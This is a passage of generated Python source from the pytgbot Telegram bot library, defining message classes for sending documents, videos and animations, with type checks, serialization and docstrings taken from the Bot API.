from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(document, InputFile, unicode_type, parameter_name="document")
self.document = document
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
self.thumb = thumb
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(disable_content_type_detection, None, bool, parameter_name="disable_content_type_detection")
self.disable_content_type_detection = disable_content_type_detection
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_document(
document=self.document,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
thumb=self.thumb,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
disable_content_type_detection=self.disable_content_type_detection,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this DocumentMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(DocumentMessage, self).to_array()
if isinstance(self.document, InputFile):
array['document'] = self.document.to_array() # type InputFile
elif isinstance(self.document, str):
array['document'] = u(self.document) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
if isinstance(self.thumb, InputFile):
array['thumb'] = self.thumb.to_array() # type InputFile
elif isinstance(self.thumb, str):
array['thumb'] = u(self.thumb) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['disable_content_type_detection'] = bool(self.disable_content_type_detection) # type bool
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the DocumentMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(DocumentMessage, DocumentMessage).validate_array(array)
if isinstance(array.get('document'), InputFile):
data['document'] = InputFile.from_array(array.get('document'))
elif isinstance(array.get('document'), str):
data['document'] = u(array.get('document'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
if array.get('thumb') is None:
data['thumb'] = None
elif isinstance(array.get('thumb'), InputFile):
data['thumb'] = InputFile.from_array(array.get('thumb'))
elif isinstance(array.get('thumb'), str):
data['thumb'] = u(array.get('thumb'))
else:
raise TypeError('Unknown type, must be one of InputFile, str or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['disable_content_type_detection'] = bool(array.get('disable_content_type_detection')) if array.get('disable_content_type_detection') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new DocumentMessage from a given dictionary.
:return: new DocumentMessage instance.
:rtype: DocumentMessage
"""
if not array: # None or {}
return None
# end if
data = DocumentMessage.validate_array(array)
return DocumentMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(documentmessage_instance)`
"""
return "DocumentMessage(document={self.document!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_content_type_detection={self.disable_content_type_detection!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(documentmessage_instance)`
"""
return "DocumentMessage(document={self.document!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, disable_content_type_detection={self.disable_content_type_detection!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in documentmessage_instance`
"""
return (
key in ["document", "receiver", "reply_id", "thumb", "caption", "parse_mode", "caption_entities", "disable_content_type_detection", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class DocumentMessage
class VideoMessage(ReturnableMessageBase):
"""
Use this method to send video files, Telegram clients support mp4 videos (other formats may be sent as Document). On success, the sent Message is returned. Bots can currently send video files of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendvideo
Parameters:
:param video: Video to send. Pass a file_id as String to send a video that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a video from the Internet, or upload a new video using multipart/form-data. More info on Sending Files »
:type video: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent video in seconds
:type duration: int
:param width: Video width
:type width: int
:param height: Video height
:type height: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Video caption (may also be used when resending videos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the video caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param supports_streaming: Pass True, if the uploaded video is suitable for streaming
:type supports_streaming: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, video, receiver=None, reply_id=DEFAULT_MESSAGE_ID, duration=None, width=None, height=None, thumb=None, caption=None, parse_mode=None, caption_entities=None, supports_streaming=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send video files, Telegram clients support mp4 videos (other formats may be sent as Document). On success, the sent Message is returned. Bots can currently send video files of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendvideo
Parameters:
:param video: Video to send. Pass a file_id as String to send a video that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a video from the Internet, or upload a new video using multipart/form-data. More info on Sending Files »
:type video: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent video in seconds
:type duration: int
:param width: Video width
:type width: int
:param height: Video height
:type height: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Video caption (may also be used when resending videos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the video caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param supports_streaming: Pass True, if the uploaded video is suitable for streaming
:type supports_streaming: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(VideoMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(video, InputFile, unicode_type, parameter_name="video")
self.video = video
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(duration, None, int, parameter_name="duration")
self.duration = duration
assert_type_or_raise(width, None, int, parameter_name="width")
self.width = width
assert_type_or_raise(height, None, int, parameter_name="height")
self.height = height
assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
self.thumb = thumb
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(supports_streaming, None, bool, parameter_name="supports_streaming")
self.supports_streaming = supports_streaming
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_video(
video=self.video,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
duration=self.duration,
width=self.width,
height=self.height,
thumb=self.thumb,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
supports_streaming=self.supports_streaming,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this VideoMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(VideoMessage, self).to_array()
if isinstance(self.video, InputFile):
array['video'] = self.video.to_array() # type InputFile
elif isinstance(self.video, str):
array['video'] = u(self.video) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['duration'] = int(self.duration) # type int
array['width'] = int(self.width) # type int
array['height'] = int(self.height) # type int
if isinstance(self.thumb, InputFile):
array['thumb'] = self.thumb.to_array() # type InputFile
elif isinstance(self.thumb, str):
array['thumb'] = u(self.thumb) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['supports_streaming'] = bool(self.supports_streaming) # type bool
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the VideoMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(VideoMessage, VideoMessage).validate_array(array)
if isinstance(array.get('video'), InputFile):
data['video'] = InputFile.from_array(array.get('video'))
elif isinstance(array.get('video'), str):
data['video'] = u(array.get('video'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
data['width'] = int(array.get('width')) if array.get('width') is not None else None
data['height'] = int(array.get('height')) if array.get('height') is not None else None
if array.get('thumb') is None:
data['thumb'] = None
elif isinstance(array.get('thumb'), InputFile):
data['thumb'] = InputFile.from_array(array.get('thumb'))
elif isinstance(array.get('thumb'), str):
data['thumb'] = u(array.get('thumb'))
else:
raise TypeError('Unknown type, must be one of InputFile, str or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['supports_streaming'] = bool(array.get('supports_streaming')) if array.get('supports_streaming') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new VideoMessage from a given dictionary.
:return: new VideoMessage instance.
:rtype: VideoMessage
"""
if not array: # None or {}
return None
# end if
data = VideoMessage.validate_array(array)
return VideoMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(videomessage_instance)`
"""
return "VideoMessage(video={self.video!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, width={self.width!r}, height={self.height!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, supports_streaming={self.supports_streaming!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(videomessage_instance)`
"""
return "VideoMessage(video={self.video!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, width={self.width!r}, height={self.height!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, supports_streaming={self.supports_streaming!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in videomessage_instance`
"""
return (
key in ["video", "receiver", "reply_id", "duration", "width", "height", "thumb", "caption", "parse_mode", "caption_entities", "supports_streaming", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class VideoMessage
class AnimationMessage(ReturnableMessageBase):
"""
Use this method to send animation files (GIF or H.264/MPEG-4 AVC video without sound). On success, the sent Message is returned. Bots can currently send animation files of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendanimation
Parameters:
:param animation: Animation to send. Pass a file_id as String to send an animation that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get an animation from the Internet, or upload a new animation using multipart/form-data. More info on Sending Files »
:type animation: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent animation in seconds
:type duration: int
:param width: Animation width
:type width: int
:param height: Animation height
:type height: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Animation caption (may also be used when resending animation by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the animation caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, animation, receiver=None, reply_id=DEFAULT_MESSAGE_ID, duration=None, width=None, height=None, thumb=None, caption=None, parse_mode=None, caption_entities=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send animation files (GIF or H.264/MPEG-4 AVC video without sound). On success, the sent Message is returned. Bots can currently send animation files of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendanimation
Parameters:
:param animation: Animation to send. Pass a file_id as String to send an animation that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get an animation from the Internet, or upload a new animation using multipart/form-data. More info on Sending Files »
:type animation: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent animation in seconds
:type duration: int
:param width: Animation width
:type width: int
:param height: Animation height
:type height: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Animation caption (may also be used when resending animation by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the animation caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(AnimationMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(animation, InputFile, unicode_type, parameter_name="animation")
self.animation = animation
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(duration, None, int, parameter_name="duration")
self.duration = duration
